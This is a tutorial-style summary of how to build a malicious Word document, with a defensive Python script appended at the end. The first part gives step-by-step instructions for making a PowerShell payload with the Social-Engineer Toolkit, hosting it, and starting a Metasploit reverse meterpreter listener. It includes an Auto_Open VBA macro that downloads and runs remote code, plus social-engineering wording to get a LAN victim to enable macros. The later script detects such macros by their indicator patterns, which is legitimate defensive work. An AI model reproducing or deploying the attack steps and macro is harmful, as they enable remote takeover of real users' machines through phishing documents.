MS Word Macro Exploit

The following is a summary of an article I read on generating a macro-based exploit for MS Word and using it to attack a user on the same LAN.

What you will need:
Microsoft Word
The Social-Engineer Toolkit (preinstalled on Kali)
Apache web server (preinstalled on Kali)
The Metasploit Framework (also preinstalled on Kali)

To Resolve:

  1. Create the payload. On Kali, open a terminal and type: setoolkit

  2. Type “1”, then “9”, then “1” for “PowerShell Alphanumeric Shellcode Injector”.

  3. Fill in the LHOST variable, which is your IP. This attack assumes you are on the same local subnet as your victim. Then fill in LPORT, which is the port you want the connection to come back on. People typically keep this at “4444”, but you can choose whatever you like. Answer “no” when asked whether to start the listener now.

  4. Now move the payload to your web server:

    mv /root/.set/reports/powershell/x86_powershell_injection.txt /var/www/html/payload.txt
    service apache2 start
  5. Now we set up the listener:

    use multi/handler
    set PAYLOAD windows/meterpreter/reverse_tcp
    set LHOST
    set LPORT 4444
  6. Now we need to add the command to our MS Word document:

    • Open a blank MS Word document, name it something like attack.docm, and make sure it is saved as macro-enabled.

    • Go to the “View” tab, click Macros, enter the name “Auto_Open” with attack.docm selected as the location, click Create, and paste in the following:

    ' Runs automatically when the document is opened (after the user clicks "Enable Content").
    Sub Auto_Open()
    Dim exec As String
    ' Launches PowerShell, which downloads the script at the URL (left blank in the article) and runs it in memory.
    exec = "powershell.exe ""IEX ((new-object net.webclient).downloadstring(''))"""
    Shell (exec)
    End Sub
    ' Alternate auto-run entry point; empty in the article.
    Sub AutoOpen()
    End Sub
    ' Excel-style entry point; never fires in Word and is empty here.
    Sub Workbook_Open()
    End Sub
    • At this point you may want to obfuscate the code, but many people don’t even know how to get to the macros section of Word, much less what macros are, so we will skip this step. If you want to know, read the article in the reference (the source).

    • Save the document

  7. Now we need to convince the victim that the document is safe. The article references wording tricks such as “to open the secure document, click ‘Enable Content’”.
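From the defender's side, the macro above has a very recognisable shape: an auto-run entry point, a process launch, and a PowerShell download cradle (IEX plus downloadstring). The script below is an added example and is not part of the article. It checks whether an Office package carries a VBA project (a .docm is a zip archive whose `word/vbaProject.bin` part holds the macros), and scores already-extracted VBA source for those indicators. It assumes the VBA source has been extracted by a separate tool (for example olevba); the sample macro is a constructed copy of the article's, the benign sample and the scoring weights and thresholds are my own, and the in-memory package builder only exists to give the check something to run against offline.

```python
"""Detection helpers for macro-enabled Word documents (added example, not from the article)."""
import io
import re
import zipfile

# Indicators from the download-cradle pattern in the article's macro, with constructed weights.
INDICATORS = {
    r"\bAuto_?Open\b|\bDocument_Open\b|\bWorkbook_Open\b": ("auto-exec entry point", 2),
    r"\bShell\b|\bWScript\.Shell\b|\bCreateObject\b": ("process launch", 2),
    r"powershell(\.exe)?": ("PowerShell invocation", 3),
    r"\bIEX\b|Invoke-Expression": ("in-memory script execution", 3),
    r"downloadstring|downloadfile|net\.webclient": ("remote download", 3),
}

# Constructed copy of the article's macro (URL left blank, as on the page).
SAMPLE_MACRO = '''Sub Auto_Open()
Dim exec As String
exec = "powershell.exe ""IEX ((new-object net.webclient).downloadstring(''))"""
Shell (exec)
End Sub
'''

# Constructed benign macro: formats text, launches nothing.
BENIGN_MACRO = '''Sub FormatReport()
Selection.Font.Bold = True
End Sub
'''


def build_package(with_vba: bool) -> bytes:
    """Build a minimal OOXML-style zip in memory (constructed test fixture, not a real Word file)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr("word/document.xml", "<document/>")
        if with_vba:
            # Real Word stores compressed VBA here; the content is irrelevant to the presence check.
            zf.writestr("word/vbaProject.bin", b"\x00placeholder\x00")
    return buf.getvalue()


def has_vba_project(data: bytes) -> bool:
    """True if the package contains a VBA project part, i.e. the file can carry macros."""
    try:
        with zipfile.ZipFile(io.BytesIO(data)) as zf:
            names = zf.namelist()
    except zipfile.BadZipFile:
        return False
    return any(name.lower().endswith("vbaproject.bin") for name in names)


def score_vba_source(source: str):
    """Score extracted VBA source; returns (total score, list of matched indicator labels)."""
    hits, score = [], 0
    for pattern, (label, weight) in INDICATORS.items():
        if re.search(pattern, source, re.IGNORECASE):
            hits.append(label)
            score += weight
    return score, hits


def classify(score: int) -> str:
    """Map a score to a triage bucket (thresholds are constructed, tune to your environment)."""
    if score >= 8:
        return "high"
    if score >= 4:
        return "medium"
    return "low" if score > 0 else "none"


if __name__ == "__main__":
    pkg = build_package(with_vba=True)
    print("VBA project present:", has_vba_project(pkg))
    for name, src in (("article macro", SAMPLE_MACRO), ("benign macro", BENIGN_MACRO)):
        score, hits = score_vba_source(src)
        print(f"{name}: score={score} ({classify(score)}) hits={hits}")
```

A presence check alone only tells you the document can run macros; the source scoring is what separates the article's cradle from an ordinary formatting macro, and on a mail gateway or endpoint the "high" bucket is the one worth quarantining or alerting on.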